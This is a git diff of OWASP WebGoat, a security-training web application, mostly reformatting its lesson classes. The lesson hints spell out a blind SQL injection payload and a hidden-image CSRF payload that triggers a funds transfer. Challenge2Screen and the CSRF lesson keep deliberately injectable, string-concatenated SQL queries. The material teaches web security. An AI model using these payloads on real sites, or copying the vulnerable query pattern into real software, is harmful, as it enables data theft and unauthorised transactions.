+					.add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br>The application is taking your input and inserting it at the end of a pre-formed SQL command. "
+							+ "You will need to make use of the following SQL functions: "
+							+ "<br><br>SELECT - query for your target data and get a string "
+							+ "<br><br>mid(string, start, length) - returns a "
+							+ "substring of string starting at the start character and going for length characters "
+							+ "<br><br>asc(string) will return the ascii value of the first character in string "
+							+ "<br><br>&gt and &lt - once you have a character's value, compare it to a choosen one");
+			hints
+					.add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br>Example: is the first character of the first_name of userid "
+							+ TARGET_ACCT_NUM
+							+ " less than 'M' (ascii 77)? "
+							+ "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+							+ TARGET_ACCT_NUM
+							+ ") , 1 , 1) ) < 77 ); "
+							+ "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
+							+ "invalid then answer is no.");
+			hints
+					.add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br> example: is the second character of the first_name of userid "
+							+ TARGET_ACCT_NUM
+							+ " greater than 'm' (ascii 109)? "
+							+ "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+							+ TARGET_ACCT_NUM
+							+ ") , 2 , 1) ) > 109 ); "
+							+ "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
+							+ "invalid then answer is no.");
+		}
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the SqlInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "The form below allows a user to enter an account number and determine if "
+				+ "it is valid or not.  Use this form to develop a true / false test check other entries in the database.  "
+				+ "<br><br>Reference Ascii Values: 'A' = 65   'Z' = 90   'a' = 97   'z' = 122 "
+				+ "<br><br>The goal is to find the value of " + "the first_name in table user_data for userid "
+				+ TARGET_ACCT_NUM
+				+ ".  Put the discovered name in the form to pass the lesson.  Only the discovered name "
+				+ "should be put into the form field, paying close attention to the spelling and capitalization.";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(70);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the DatabaseFieldScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Blind SQL Injection");
+	}
+
+	/**
+	 * Constructor for the DatabaseFieldScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void handleRequest(WebSession s)
+	{
+		try
+		{
+			super.handleRequest(s);
+		} catch (Exception e)
+		{
+			System.out.println("Exception caught: " + e);
+			e.printStackTrace(System.out);
+		}
 	}
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
index e99c9b428..8266e8855 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
@@ -1,110 +1,103 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.StringElement;
-
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class BufferOverflow extends LessonAdapter
 {
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	// just to get the generic how to text.
-	return super.createContent(s);
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		// just to get the generic how to text.
+		return super.createContent(s);
+	}
 
+	/**
+	 * Gets the category attribute of the ForgotPassword object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
 
-    /**
-     *  Gets the category attribute of the ForgotPassword object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
+		return Category.BUFFER_OVERFLOW;
+	}
 
-	return Category.BUFFER_OVERFLOW;
-    }
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Lesson Hint 1");
+		hints.add("Lesson Hint 2");
 
+		return hints;
+	}
 
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("Lesson Hint 1");
-	hints.add("Lesson Hint 2");
+	private final static Integer DEFAULT_RANKING = new Integer(15);
 
-	return hints;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(15);
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Buffer Overflow");
+	}
 
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Buffer Overflow");
-    }
-
-
-    public Element getCredits()
-    {
-	return new StringElement(
-		"This screen created by: Your name could go here");
-    }
+	public Element getCredits()
+	{
+		return new StringElement("This screen created by: Your name could go here");
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
index 55e977602..dbfd7ecfe 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -6,7 +7,6 @@ import java.sql.ResultSet;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -24,39 +24,40 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
-/*******************************************************************************
+
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
-
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * 
  */
-public class CSRF extends LessonAdapter {
+public class CSRF extends LessonAdapter
+{
 
 	private final static String MESSAGE = "message";
 	private final static int MESSAGE_COL = 3;
@@ -66,248 +67,257 @@ public class CSRF extends LessonAdapter {
 	private final static String TITLE = "title";
 	private final static int TITLE_COL = 2;
 	private static int count = 1;
-	private final static int USER_COL = 4;	// Added by Chuck Willis - used to show user who posted message
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
-	
+	private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
+											// message
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
+
 	/**
-	 *  Adds a feature to the Message attribute of the MessageBoardScreen object
-	 *
-	 * @param  s  The feature to be added to the Message attribute
+	 * Adds a feature to the Message attribute of the MessageBoardScreen object
+	 * 
+	 * @param s
+	 *            The feature to be added to the Message attribute
 	 */
-	protected void addMessage( WebSession s )
+	protected void addMessage(WebSession s)
 	{
 		try
 		{
-			String title = HtmlEncoder.encode( s.getParser().getRawParameter( TITLE, "" ) );
-			String message = s.getParser().getRawParameter( MESSAGE, "" );
+			String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
+			String message = s.getParser().getRawParameter(MESSAGE, "");
 
-			Connection connection = DatabaseUtilities.getConnection( s );
+			Connection connection = DatabaseUtilities.getConnection(s);
 
 			String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
 
-			PreparedStatement statement = connection.prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+			PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+																		ResultSet.CONCUR_READ_ONLY);
 			statement.setInt(1, count++);
 			statement.setString(2, title);
 			statement.setString(3, message);
 			statement.setString(4, s.getUserName());
-			statement.executeUpdate();
-			
-		}
-		catch ( Exception e )
+			statement.execute();
+
+		} catch (Exception e)
 		{
-				s.setMessage( "Could not add message to database" );
+			s.setMessage("Could not add message to database");
 		}
 	}
-	
+
 	@Override
-	protected Element createContent(WebSession s) {
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-		
-		addMessage( s );
-		ec.addElement( makeInput( s ) );
-		ec.addElement( new HR() );
-		ec.addElement( makeCurrent( s ) );
-		ec.addElement( new HR() );
-		ec.addElement( makeList( s ) );
-		
+
+		addMessage(s);
+		ec.addElement(makeInput(s));
+		ec.addElement(new HR());
+		ec.addElement(makeCurrent(s));
+		ec.addElement(new HR());
+		ec.addElement(makeList(s));
+
 		return ec;
 	}
 
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	protected Element makeInput( WebSession s )
+	protected Element makeInput(WebSession s)
 	{
-		Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+		Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
 		TR row1 = new TR();
 		TR row2 = new TR();
-		row1.addElement( new TD( new StringElement( "Title: " ) ) );
+		row1.addElement(new TD(new StringElement("Title: ")));
 
-		Input inputTitle = new Input( Input.TEXT, TITLE, "" );
-		row1.addElement( new TD( inputTitle ) );
+		Input inputTitle = new Input(Input.TEXT, TITLE, "");
+		row1.addElement(new TD(inputTitle));
 
 		TD item1 = new TD();
-		item1.setVAlign( "TOP" );
-		item1.addElement( new StringElement( "Message: " ) );
-		row2.addElement( item1 );
+		item1.setVAlign("TOP");
+		item1.addElement(new StringElement("Message: "));
+		row2.addElement(item1);
 
 		TD item2 = new TD();
-		TextArea ta = new TextArea( MESSAGE, 5, 60 );
-		item2.addElement( ta );
-		row2.addElement( item2 );
-		t.addElement( row1 );
-		t.addElement( row2 );
+		TextArea ta = new TextArea(MESSAGE, 5, 60);
+		item2.addElement(ta);
+		row2.addElement(item2);
+		t.addElement(row1);
+		t.addElement(row2);
 
-		Element b = ECSFactory.makeButton( "Submit" );
+		Element b = ECSFactory.makeButton("Submit");
 		ElementContainer ec = new ElementContainer();
-		ec.addElement( t );
-		ec.addElement( new P().addElement( b ) );
+		ec.addElement(t);
+		ec.addElement(new P().addElement(b));
 
-		return ( ec );
+		return (ec);
 	}
 
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	public Element makeList( WebSession s )
+	public Element makeList(WebSession s)
 	{
-		Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+		Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
 
 		try
 		{
-			Connection connection = DatabaseUtilities.getConnection( s );
+			Connection connection = DatabaseUtilities.getConnection(s);
 
-			Statement statement = connection.createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
-			
-			ResultSet results = statement.executeQuery( STANDARD_QUERY + " WHERE user_name LIKE '" + getNameroot( s.getUserName() ) + "%'" );
+			Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																ResultSet.CONCUR_READ_ONLY);
 
-			if ( ( results != null ) && ( results.first() == true ) )
+			ResultSet results = statement.executeQuery(STANDARD_QUERY + " WHERE user_name LIKE '"
+					+ getNameroot(s.getUserName()) + "%'");
+
+			if ((results != null) && (results.first() == true))
 			{
 				results.beforeFirst();
 
-				for ( int i = 0; results.next(); i++ )
+				for (int i = 0; results.next(); i++)
 				{
-					String link = "<a href='" + getLink() + "&" + NUMBER + "=" + results.getInt( NUM_COL ) +
-					"' style='cursor:hand'>" +  results.getString( TITLE_COL ) + "</a>";
-					TD td = new TD().addElement( link );
-					TR tr = new TR().addElement( td );
-					t.addElement( tr );
+					String link = "<a href='" + getLink() + "&" + NUMBER + "=" + results.getInt(NUM_COL)
+							+ "' style='cursor:hand'>" + results.getString(TITLE_COL) + "</a>";
+					TD td = new TD().addElement(link);
+					TR tr = new TR().addElement(td);
+					t.addElement(tr);
 				}
 			}
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
-			s.setMessage( "Error while getting message list." );
+			s.setMessage("Error while getting message list.");
 		}
 
 		ElementContainer ec = new ElementContainer();
-		ec.addElement( new H1( "Message List" ) );
-		ec.addElement( t );
-		String transferFunds = s.getParser().getRawParameter("transferFunds" , "");
+		ec.addElement(new H1("Message List"));
+		ec.addElement(t);
+		String transferFunds = s.getParser().getRawParameter("transferFunds", "");
 		if (transferFunds.length() != 0)
 		{
 			makeSuccess(s);
 		}
-		
 
-		return ( ec );
+		return (ec);
 	}
 
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	protected Element makeCurrent( WebSession s )
+	protected Element makeCurrent(WebSession s)
 	{
 		ElementContainer ec = new ElementContainer();
 
 		try
 		{
-			int messageNum = s.getParser().getIntParameter( NUMBER, 0 );
+			int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+
+			Connection connection = DatabaseUtilities.getConnection(s);
 
-			Connection connection = DatabaseUtilities.getConnection( s );
-			
 			String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
-			PreparedStatement statement = connection.prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
-			statement.setString(1, getNameroot( s.getUserName() ) + "%");
+			PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+																		ResultSet.CONCUR_READ_ONLY);
+			statement.setString(1, getNameroot(s.getUserName()) + "%");
 			statement.setInt(2, messageNum);
 			ResultSet results = statement.executeQuery();
 
-			if ( ( results != null ) && results.first() )
+			if ((results != null) && results.first())
 			{
-				ec.addElement( new H1( "Message Contents For: " + results.getString( TITLE_COL )) );
-				Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
-				TR row1 = new TR( new TD( new B(new StringElement( "Title:" )) ) );
-				row1.addElement( new TD( new StringElement( results.getString( TITLE_COL ) ) ) );
-				t.addElement( row1 );
+				ec.addElement(new H1("Message Contents For: " + results.getString(TITLE_COL)));
+				Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+				TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
+				row1.addElement(new TD(new StringElement(results.getString(TITLE_COL))));
+				t.addElement(row1);
+
+				String messageData = results.getString(MESSAGE_COL);
+				TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
+				row2.addElement(new TD(new StringElement(messageData)));
+				t.addElement(row2);
+
+				TR row3 = new TR(new TD(new StringElement("Posted By:")));
+				row3.addElement(new TD(new StringElement(results.getString(USER_COL))));
+				t.addElement(row3);
+
+				ec.addElement(t);
 
-				String messageData = results.getString( MESSAGE_COL );
-				TR row2 = new TR( new TD( new B(new StringElement( "Message:" )) ) );
-				row2.addElement( new TD( new StringElement( messageData ) ) );
-				t.addElement( row2 );
-											
-				TR row3 = new TR( new TD( new StringElement( "Posted By:" ) ) );
-				row3.addElement( new TD( new StringElement( results.getString( USER_COL ) ) ) );
-				t.addElement( row3 );
-								
-				ec.addElement( t );
-								
 			}
 			else
 			{
-				if ( messageNum != 0 )
+				if (messageNum != 0)
 				{
-					ec.addElement( new P().addElement( "Could not find message " + messageNum ) );
+					ec.addElement(new P().addElement("Could not find message " + messageNum));
 				}
 			}
 
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
-			s.setMessage( "Error generating " + this.getClass().getName() );
+			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
 
-		return ( ec );
+		return (ec);
 	}
 
-	@Override	
-	protected Category getDefaultCategory() {
+	@Override
+	protected Category getDefaultCategory()
+	{
 		return Category.XSS;
 	}
 
 	private final static Integer DEFAULT_RANKING = new Integer(120);
-	
+
 	@Override
-	protected Integer getDefaultRanking() {
-		
+	protected Integer getDefaultRanking()
+	{
+
 		return DEFAULT_RANKING;
 	}
 
-	@Override	
-	protected List<String> getHints(WebSession s) {
+	@Override
+	protected List<String> getHints(WebSession s)
+	{
 		List<String> hints = new ArrayList<String>();
-		hints.add( "Enter some text and try to include an image in there." );
-		hints.add( "In order to make the picture almost invisible try to add width=\"1\" and height=\"1\"." );
-		hints.add( "The format of an image in html is <pre>&lt;img src=\"[URL]\" width=\"1\" height=\"1\" /&gt;</pre>");		
-		hints.add( "Include this URL in the message <pre>&lt;img src='" + getLink() +
-			        "&transferFunds=5000' width=\"1\" height=\"1\" /&gt;</pre>");
-		
+		hints.add("Enter some text and try to include an image in there.");
+		hints.add("In order to make the picture almost invisible try to add width=\"1\" and height=\"1\".");
+		hints.add("The format of an image in html is <pre>&lt;img src=\"[URL]\" width=\"1\" height=\"1\" /&gt;</pre>");
+		hints.add("Include this URL in the message <pre>&lt;img src='" + getLink()
+				+ "&transferFunds=5000' width=\"1\" height=\"1\" /&gt;</pre>");
+
 		return hints;
 	}
 
 	/**
-	 *  Gets the title attribute of the MessageBoardScreen object
-	 *
-	 * @return    The title value
+	 * Gets the title attribute of the MessageBoardScreen object
+	 * 
+	 * @return The title value
 	 */
 	public String getTitle()
 	{
-		return ( "Cross Site Request Forgery (CSRF)" );
+		return ("Cross Site Request Forgery (CSRF)");
 	}
 
-	private static String getNameroot( String name )
+	private static String getNameroot(String name)
 	{
 		String nameroot = name;
-		if (nameroot.indexOf('-') != -1) 
+		if (nameroot.indexOf('-') != -1)
 		{
-			nameroot = nameroot.substring(0, nameroot.indexOf('-')); 
+			nameroot = nameroot.substring(0, nameroot.indexOf('-'));
 		}
 		return nameroot;
 	}
 
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
-	
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+	}
+
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
index f388b7472..e69fbcc90 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
@@ -1,35 +1,35 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.Iterator;
 import java.util.List;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
index ae55a66a0..b95e024b2 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.BufferedReader;
@@ -16,9 +17,7 @@ import java.util.ArrayList;
 import java.util.List;
 import java.util.StringTokenizer;
 import java.util.Vector;
-
 import javax.servlet.http.Cookie;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -39,32 +38,31 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.Exec;
 import org.owasp.webgoat.util.ExecResults;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -195,8 +193,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 		s.getResponse().addCookie(newCookie);
 
 		ElementContainer ec = new ElementContainer();
-		if (s.getParser().getStringParameter(Input.SUBMIT, "")
-				.equals(PROCEED_TO_NEXT_STAGE + "(3)"))
+		if (s.getParser().getStringParameter(Input.SUBMIT, "").equals(PROCEED_TO_NEXT_STAGE + "(3)"))
 		{
 			s.setMessage("Welcome to stage 3 -- deface the site");
 			setStage(s, 3);
@@ -205,11 +202,11 @@ public class Challenge2Screen extends SequentialLessonAdapter
 			return doStage3(s);
 		}
 
-                Connection connection = DatabaseUtilities.getConnection(s);
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+		Statement statement3 = connection
+				.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 
-		Statement statement3 = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-	
 		// pull the USER_COOKIE from the cookies
 		String user = getCookie(s);
 		String query = "SELECT * FROM user_data WHERE last_name = '" + user + "'";
@@ -225,48 +222,46 @@ public class Challenge2Screen extends SequentialLessonAdapter
 				String num = results.getString("cc_number");
 				v.addElement(type + "-" + num);
 			}
-	    	        if (v.size() != 13)
+			if (v.size() != 13)
 			{
 				s.setMessage("Try to get all the credit card numbers");
-		    	}
-	    
-				ec.addElement(buildCart(s));
+			}
 
-			Table t = new Table().setCellSpacing(0).setCellPadding(2)
-				.setBorder(0).setWidth("90%").setAlign("center");
+			ec.addElement(buildCart(s));
 
-				ec.addElement(new BR());
-				TR tr = new TR();
-				tr.addElement(new TD().addElement("Please select credit card for this purchase: "));
-				Element p = ECSFactory.makePulldown(CREDIT, v);
-				tr.addElement(new TD().addElement(p).setAlign("right"));
-				t.addElement(tr);
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
-				tr = new TR();
-				Element b = ECSFactory.makeButton("Buy Now!");
-				tr.addElement(new TD().addElement(b));
-				t.addElement(tr);
-				ec.addElement(t);
+			ec.addElement(new BR());
+			TR tr = new TR();
+			tr.addElement(new TD().addElement("Please select credit card for this purchase: "));
+			Element p = ECSFactory.makePulldown(CREDIT, v);
+			tr.addElement(new TD().addElement(p).setAlign("right"));
+			t.addElement(tr);
 
-				ec.addElement(new BR());
-				Input input = new Input(Input.HIDDEN, USER, "White");
-				ec.addElement(input);
-		
-			//STAGE 3 BUTTON
+			tr = new TR();
+			Element b = ECSFactory.makeButton("Buy Now!");
+			tr.addElement(new TD().addElement(b));
+			t.addElement(tr);
+			ec.addElement(t);
+
+			ec.addElement(new BR());
